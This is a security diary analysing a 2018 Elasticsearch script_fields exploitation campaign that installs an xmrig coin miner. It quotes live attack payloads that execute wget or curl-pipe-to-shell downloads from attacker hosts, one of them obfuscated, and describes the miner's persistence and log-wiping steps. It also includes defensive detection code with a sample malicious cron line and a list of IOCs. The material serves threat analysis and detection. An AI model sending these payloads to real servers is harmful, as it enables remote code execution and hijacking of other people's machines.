CoinMiners searching for hosts

Published: 2018-11-30
Last Updated: 2018-11-30 13:43:41 UTC
by Remco Verhoef (Version: 1)

We've seen Elasticsearch being exploited through queries with script_fields for a while now, but we're seeing increased activity.

Attacks coming from 69.30.211.82 are trying to exploit this vulnerability to execute shell commands. We've seen the following exploits in the wild:

  • URL /_search?pretty containing the payload and search query:
    {"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo\").getText()"}}}
  • URL /_search?pretty containing the payload and search query:
    {"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"curl -fsSL http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh |sh\").getText()"}}}
  • URL /_search?source containing the payload and search query:
    {"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(new String[] {\"/bin/bash\",\"-c\",((char)119+(char)103+(char)101+(char)116+(char)32+(char)104+(char)116+(char)116+(char)112+(char)58+(char)47+(char)47+(char)54+(char)57+(char)46+(char)51+(char)48+(char)46+(char)50+(char)48+(char)51+(char)46+(char)49+(char)55+(char)48+(char)47+(char)103+(char)76+(char)109+(char)119+(char)68+(char)85+(char)56+(char)54+(char)114+(char)57+(char)112+(char)77+(char)51+(char)114+(char)88+(char)102+(char)47+(char)117+(char)112+(char)100+(char)97+(char)116+(char)101+(char)46+(char)115+(char)104+(char)32+(char)45+(char)80+(char)32+(char)47+(char)116+(char)109+(char)112+(char)47+(char)115+(char)115+(char)115+(char)111+(char)111+(char)111).toString() }).getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str+\"|\");}sb.toString();"}}, "size": 1}

Decoding the (char) concatenation in the last exploit yields wget http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo. The script_field name lupin could originate from one of the initial exploits. The requests use the user agent python-requests/2.20.1.

The command downloads and executes update.sh. This bash script kills and disables other miners, creates persistence using cron, adds its own SSH public key to the authorized_keys file, and downloads the devtool binary (xmrig) together with its config.json. Devtool is actually a (variant of) xmrig, a CoinMiner. If update.sh runs as root, the files are installed in /etc, otherwise in /tmp. It then starts the miner and configures iptables to drop ports 3333, 5555, 7777 and 9999, ports that are often used by mining pools. When finished it cleans logs to wipe out evidence.
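The artefacts that update.sh leaves behind (a foreign key in authorized_keys, a cron entry that re-fetches a script, iptables DROP rules for the pool ports) can be checked for on a suspect host. The following is an added triage example, not the diary's or the attacker's script; it works on file contents passed as strings, the inputs are constructed, and the key material in KNOWN_BAD_KEYS is a placeholder where the ssh-rsa key from the IOC list would go.

```python
import re
from typing import Dict, List

# Ports the diary says update.sh tells iptables to drop; common mining-pool ports.
MINER_POOL_PORTS = {"3333", "5555", "7777", "9999"}
# Base64 key material to match in authorized_keys. The real value is the ssh-rsa key
# in the diary's IOC list; this entry is a constructed placeholder so the example runs offline.
KNOWN_BAD_KEYS = {"AAAAB3NzaC1yc2EAAAADAQABAAABAQCplaceholderFromIocList=="}
CRON_FETCH = re.compile(r"\b(wget|curl)\b.*https?://.*(\|\s*(ba)?sh\b|update\.sh)")
IPT_DROP = re.compile(r"--dport\s+(\d+)\b.*-j\s+DROP")


def authorized_keys_hits(content: str) -> List[str]:
    """Lines of an authorized_keys file whose key material is on the bad list."""
    hits = []
    for line in content.splitlines():
        parts = line.split()          # type, base64 material, optional comment
        if len(parts) >= 2 and parts[1] in KNOWN_BAD_KEYS:
            hits.append(line)
    return hits


def cron_hits(crontab: str) -> List[str]:
    """Non-comment cron entries that fetch over HTTP and pipe to a shell, or pull update.sh."""
    return [l for l in crontab.splitlines()
            if not l.lstrip().startswith("#") and CRON_FETCH.search(l)]


def iptables_dropped_pool_ports(rules: str) -> List[str]:
    """Pool ports that appear in DROP rules of `iptables -S` style output."""
    found = {m.group(1) for m in map(IPT_DROP.search, rules.splitlines()) if m}
    return sorted(found & MINER_POOL_PORTS)


# Constructed sample host state: the second key, the curl|sh cron line and the two
# DROP rules are the kind of artefacts the script described above leaves behind.
SAMPLE_AUTHORIZED_KEYS = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClegitKeyMaterial== admin@workstation\n"
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCplaceholderFromIocList== root@attacker\n")
SAMPLE_CRONTAB = ("# m h dom mon dow command\n"
                  "0 3 * * * /usr/local/bin/backup.sh\n"
                  "*/10 * * * * curl -fsSL http://203.0.113.7/update.sh | sh\n")
SAMPLE_IPTABLES = ("-P OUTPUT ACCEPT\n"
                   "-A OUTPUT -p tcp -m tcp --dport 443 -j ACCEPT\n"
                   "-A OUTPUT -p tcp --dport 3333 -j DROP\n"
                   "-A OUTPUT -p tcp --dport 9999 -j DROP\n")


def triage(keys=SAMPLE_AUTHORIZED_KEYS, crontab=SAMPLE_CRONTAB, rules=SAMPLE_IPTABLES) -> Dict[str, list]:
    """Collect all three indicator checks in one report."""
    return {"authorized_keys": authorized_keys_hits(keys), "cron": cron_hits(crontab),
            "dropped_pool_ports": iptables_dropped_pool_ports(rules)}
```

On a live host, feed it ~/.ssh/authorized_keys of each user, `crontab -l` output (plus /etc/cron.d) and `iptables -S` instead of the samples.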

The same server has previously targeted vulnerable Huawei devices (requests to /ctrlt/DeviceUpgrade_1), trying to execute a script fetched from http://167.179.82.68/t.sh.

51.38.191.178

This host is also scanning for exploitable Elasticsearch instances (and other vulnerable services). It tries to execute id and checks whether the response is the expected one.

  • {"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
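Both the miner's payloads above and this id probe share the same shape: a _search body whose script_fields value reaches Runtime.exec, sometimes with the command spelled out as a (char)NNN+... concatenation. The following is an added detection example, not code from the diary, that inspects request bodies, decodes that obfuscation and recovers the command; the sample requests and their source addresses are constructed.

```python
import json
import re
from typing import Optional

# Script fragments that show a script_field is being used to spawn a process.
RCE_MARKERS = ("Runtime", "forName(", ".exec(", "ProcessBuilder")
# The (char)NNN+(char)NNN+... concatenation used by the third payload above.
CHAR_CONCAT = re.compile(r"(?:\(char\)\d+\+?)+")
EXEC_STRING = re.compile(r'exec\("([^"]+)"\)')
BASH_C_ARG = re.compile(r'"-c",\s*\((.*?)\)\.toString\(\)')


def decode_char_concat(text: str) -> str:
    """Replace every (char)NNN+... run with the string it spells out."""
    def spell(m):
        return "".join(chr(int(n)) for n in re.findall(r"\(char\)(\d+)", m.group(0)))
    return CHAR_CONCAT.sub(spell, text)


def extract_command(script: str) -> Optional[str]:
    """Pull the OS command out of a decoded script: exec("cmd") or the bash -c array form."""
    m = EXEC_STRING.search(script) or BASH_C_ARG.search(script)
    return m.group(1) if m else None


def inspect_request(src_ip: str, path: str, body: str) -> Optional[dict]:
    """Return a finding when a _search body carries exec-style code in script_fields."""
    if "script_fields" not in body:
        return None
    try:
        fields = json.loads(body).get("script_fields", {})
    except (ValueError, AttributeError):   # not a JSON object: nothing to walk
        fields = {}
    for field in fields.values():
        raw = field.get("script", "") if isinstance(field, dict) else ""
        if any(marker in raw for marker in RCE_MARKERS):
            decoded = decode_char_concat(raw)
            return {"src_ip": src_ip, "path": path,
                    "command": extract_command(decoded), "script": decoded}
    return None


# Constructed sample requests (source IP, path, body), modelled on the diary's payloads.
SAMPLE_REQUESTS = [
    ("203.0.113.10", "/_search?pretty", json.dumps({"size": 1, "script_fields": {"lupin": {
        "script": 'java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()'}}})),
    ("203.0.113.11", "/_search?source", json.dumps({"query": {"match_all": {}}, "script_fields": {"exp": {
        "script": 'Runtime.getRuntime().exec(new String[] {"/bin/bash","-c",((char)105+(char)100).toString() })'}}})),
    ("198.51.100.5", "/_search?pretty", json.dumps({"size": 1, "query": {"match_all": {}}})),
]


def scan(requests=SAMPLE_REQUESTS) -> list:
    """Run inspect_request over a request list and keep only the findings."""
    return [f for f in (inspect_request(*r) for r in requests) if f]
```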

IOC

  • ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAuna/E/UUQaGkVWuD613/07snQnMGFpOq3HlK9SNAEgXt3WwOPCHX6buuDTizo1dZFSbAK7ung0Ff4sYSN11hNeafySGivNBsRVnZGTJweUGOvXHuevIxlnEghaJ387SBNXEJwJUNLjoWbsTsYPF5GDt4RUJiLq2hVRyUQpxTX6G8MQWJ5t8A0WMGRzwxwNr7acS8NwNZ7PtedmGyXWGAnyg3CD3YT0kO+IaiX4i2mtLGNYxniHc/RK5Ba3r8LzuWvOlgXb9rGuCvGHKml+fYjQFUmGQse9Sfyqglm+rrQVQefphgEU0DG9JXvufmybc6XYqcNJfJnGIU8pz4p0QS0Q== root@s137446.wholesaleinternet.net
  • 69.30.203.170
  • 51.38.191.178
  • 69.30.211.82

If you have any data, let me know. 

Remco Verhoef (@remco_verhoef)
ISC Handler – Founder of DutchSec
